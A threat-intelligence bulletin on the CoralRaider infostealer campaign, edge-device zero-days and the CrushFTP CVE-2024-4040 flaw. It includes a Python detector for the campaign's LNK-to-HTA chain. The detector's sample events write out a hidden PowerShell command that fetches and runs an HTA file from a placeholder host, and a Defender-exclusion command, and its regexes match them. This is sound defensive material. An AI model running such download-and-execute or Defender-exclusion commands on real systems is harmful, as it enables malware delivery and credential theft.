Ransomware/Malware Activity
Infostealer Malware Campaign Attributed to CoralRaider Exploits CDN Cache
Cybersecurity researchers have attributed an ongoing infostealer malware campaign to a threat actor tracked as "CoralRaider". CoralRaider is a financially motivated group of suspected Vietnamese origin, previously known for targeting victims in Asian and Southeast Asian countries. The current campaign has also been observed targeting countries including the United States (U.S.), Germany, Poland, Japan, and Ecuador.
- The campaign is designed to deliver infostealer malware including LummaC2, Rhadamanthys, and Cryptbot. The attack begins with a Windows shortcut (LNK) file, delivered via phishing or malvertising. The shortcut contains PowerShell commands that fetch an obfuscated HTML Application (HTA) file from the CDN cache of an attacker-controlled subdomain; serving the file from the CDN edge avoids request delays and makes the download look like ordinary CDN traffic to network defenders. The HTA file contains JavaScript that embeds a PowerShell decrypter and loader. The PowerShell loader drops scripts on the victim's machine that evade detection by adding a directory to the Windows Defender exclusion list and bypassing User Account Control (UAC). The loader then writes the final infostealer payload into that excluded directory, where Defender will not scan it. The infostealers used in this campaign are recent versions sold as malware-as-a-service on underground forums.
- The operators profit from stolen data such as user credentials, RDP logins, and browser session cookies by selling it to other malicious actors, who use it to gain initial access to victim networks.
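The execution chain in the first bullet above lends itself to a host-based detection. The following Python script is an added example, not code from the original article or from the Cisco Talos report: it runs over constructed process-creation and file-creation events (shaped loosely like Sysmon Event ID 1 and 11 fields) and flags the three behaviours in sequence: explorer.exe launching PowerShell to fetch an .hta file, a descendant PowerShell process adding a Windows Defender exclusion path, and a payload written beneath that excluded path. The domain cdn.example.invalid, the file paths, and the PIDs are all invented for the example.

```python
"""Added example: detector for the LNK -> HTA -> Defender-exclusion -> payload
chain described above. The events are constructed, not real campaign telemetry."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str                 # "process" (process creation) or "file" (file creation)
    pid: int
    ppid: int = 0
    image: str = ""
    parent_image: str = ""
    cmdline: str = ""
    target: str = ""          # created file path, for "file" events


# Stage 1: the LNK target is a PowerShell one-liner that downloads an .hta file.
HTA_FETCH = re.compile(
    r"(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b.*\.hta\b", re.I)
# Stage 2: the loader carves out a Defender exclusion for its drop directory.
EXCLUSION = re.compile(
    r"(?:Add|Set)-MpPreference\s+-ExclusionPath\s+(?:'([^']+)'|\"([^\"]+)\"|(\S+))", re.I)
PAYLOAD_EXT = (".exe", ".dll", ".ps1", ".bat")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _descends_from(pid: int, ancestor: int, parents: dict, max_depth: int = 16) -> bool:
    """Walk the parent chain; True if `ancestor` is an ancestor of `pid`."""
    for _ in range(max_depth):
        pid = parents.get(pid)
        if pid is None:
            return False
        if pid == ancestor:
            return True
    return False


def detect_chain(events):
    """Return the pieces of the chain found and whether they link together."""
    parents = {e.pid: e.ppid for e in events if e.kind == "process"}
    # Stage 1: explorer.exe (which launches LNK targets) -> powershell.exe fetching an HTA
    hta_fetch = [e.pid for e in events
                 if e.kind == "process"
                 and _basename(e.image) == "powershell.exe"
                 and _basename(e.parent_image) == "explorer.exe"
                 and HTA_FETCH.search(e.cmdline)]
    # Stage 2: any process adding a Defender exclusion path (path -> pid)
    exclusions = {}
    for e in events:
        if e.kind != "process":
            continue
        m = EXCLUSION.search(e.cmdline)
        if m:
            path = (m.group(1) or m.group(2) or m.group(3)).rstrip("\\")
            exclusions[path] = e.pid
    # Stage 3: a payload written underneath one of the excluded directories
    drops = [e.target for e in events
             if e.kind == "file"
             and e.target.lower().endswith(PAYLOAD_EXT)
             and any(e.target.lower().startswith(p.lower() + "\\") for p in exclusions)]
    # The chain links when the exclusion was set by a descendant of the LNK-spawned shell
    chained = bool(hta_fetch) and bool(drops) and any(
        _descends_from(pid, root, parents)
        for pid in exclusions.values() for root in hta_fetch)
    return {"hta_fetch": hta_fetch, "exclusions": exclusions,
            "payload_drops": drops, "chained": chained}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed events; domain, paths and PIDs are invented
    Event("process", 4120, 1032, PS, r"C:\Windows\explorer.exe",
          r'powershell.exe -w hidden -ep bypass -c "iwr http://cdn.example.invalid/loader.hta'
          r' -OutFile $env:TEMP\loader.hta; mshta $env:TEMP\loader.hta"'),
    Event("process", 4188, 4120, r"C:\Windows\System32\mshta.exe", PS,
          r"mshta C:\Users\victim\AppData\Local\Temp\loader.hta"),
    Event("process", 4210, 4188, PS, r"C:\Windows\System32\mshta.exe",
          r'''powershell -w hidden -c "Add-MpPreference -ExclusionPath 'C:\ProgramData\Update'"'''),
    Event("file", 4210, target=r"C:\ProgramData\Update\svc.exe"),
    # benign noise: an interactive PowerShell launched from Explorer
    Event("process", 5120, 1032, PS, r"C:\Windows\explorer.exe", "powershell -c Get-Date"),
]

if __name__ == "__main__":
    print(detect_chain(SAMPLE_EVENTS))
```

Each stage on its own is noisy (administrators do add Defender exclusions); the value is in linking the exclusion and the drop back to the Explorer-spawned PowerShell through the parent-process chain, which is why the script tracks PIDs rather than matching command lines in isolation.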
CTIX analysts will continue to report on novel and evolving malware and associated campaigns.
- Bleeping Computer: CoralRaider Article
- The Hacker News: CoralRaider Article
- Cisco Talos Blog: CoralRaider Threat Spotlight
Threat Actor Activity
Chinese & Russian Hackers Moving Toward Edge Zero-Day Exploits for Increased Detection Evasion
An increase in espionage attacks has led researchers to observe a notable tactical shift by Chinese and Russian hackers toward edge devices such as VPN (Virtual Private Network) appliances, firewalls, routers, and Internet of Things (IoT) devices. Previously, hackers commonly targeted employees with phishing emails to gain access to companies; last year, however, saw one of the lowest recent volumes of espionage attacks on Windows computers. Instead, the trend has moved toward zero-day vulnerabilities in, and malware for, edge devices.
- Researchers believe that Endpoint Detection and Response (EDR) solutions have reached a level of effectiveness where threat actors have better odds of avoiding detection by deploying malware on a device that cannot run an EDR agent, such as a VPN appliance, than on a Windows computer. This is supported by a 50% growth in zero-days used by both espionage groups and financially motivated attackers last year compared to 2022.
- Exploiting zero-day vulnerabilities in widely deployed edge devices lets hackers remain undetected for longer than on traditional targets such as EDR-protected Windows computers. This reflects the emphasis on stealth and longevity within compromised systems that characterises espionage operations.
- Although exploiting edge vulnerabilities has become a favored approach for both espionage and criminal activity as a way of staying in a system longer without being flagged by security tooling, the average "dwell time" in breached systems has nonetheless fallen to a record low of roughly ten days, indicating improved detection capabilities and stronger defenses against sophisticated threats.
CTIX analysts recommend that organizations extend monitoring and detection to their edge devices, which typically cannot run EDR agents, by collecting and reviewing those devices' logs and applying vendor patches promptly.
Vulnerabilities
Thousands of CrushFTP Servers May be Vulnerable to the Exploitation of a Patched Vulnerability
UPDATE: Over 1,400 CrushFTP servers exposed to the public internet remain at risk from a critical vulnerability. The flaw, tracked as CVE-2024-4040, is a server-side template injection (SSTI) vulnerability that was exploited as a zero-day before a patch was available. It allows an escape from CrushFTP's virtual file system (VFS) sandbox, leading to arbitrary file reads and full remote code execution (RCE) on unpatched systems. Security researchers describe the flaw as fully unauthenticated and trivially exploitable: an attacker can bypass authentication, gain administrative access, and execute code as root.
The issue has drawn significant attention, with cybersecurity firms observing exploitation in targeted attacks against U.S. organizations, suggesting a politically motivated intelligence-gathering effort. Shodan scans show that over 5,000 CrushFTP servers are currently internet-exposed, though it is unclear how many of those are still vulnerable.
Following the vulnerability disclosure and patch release by CrushFTP, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-4040 to its Known Exploited Vulnerabilities (KEV) catalog, directing U.S. federal agencies to secure their servers by May 1, 2024. CrushFTP has urged users to update their systems immediately and to check frequently for the latest security updates. This situation underscores the importance of timely patching to protect sensitive data and infrastructure from potential cyber threats.
CTIX analysts recommend that CrushFTP administrators ensure their infrastructure is updated and, because the flaw was exploited as a zero-day, conduct an internal investigation for evidence of exploitation on any server that was internet-exposed before the patch was applied.
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.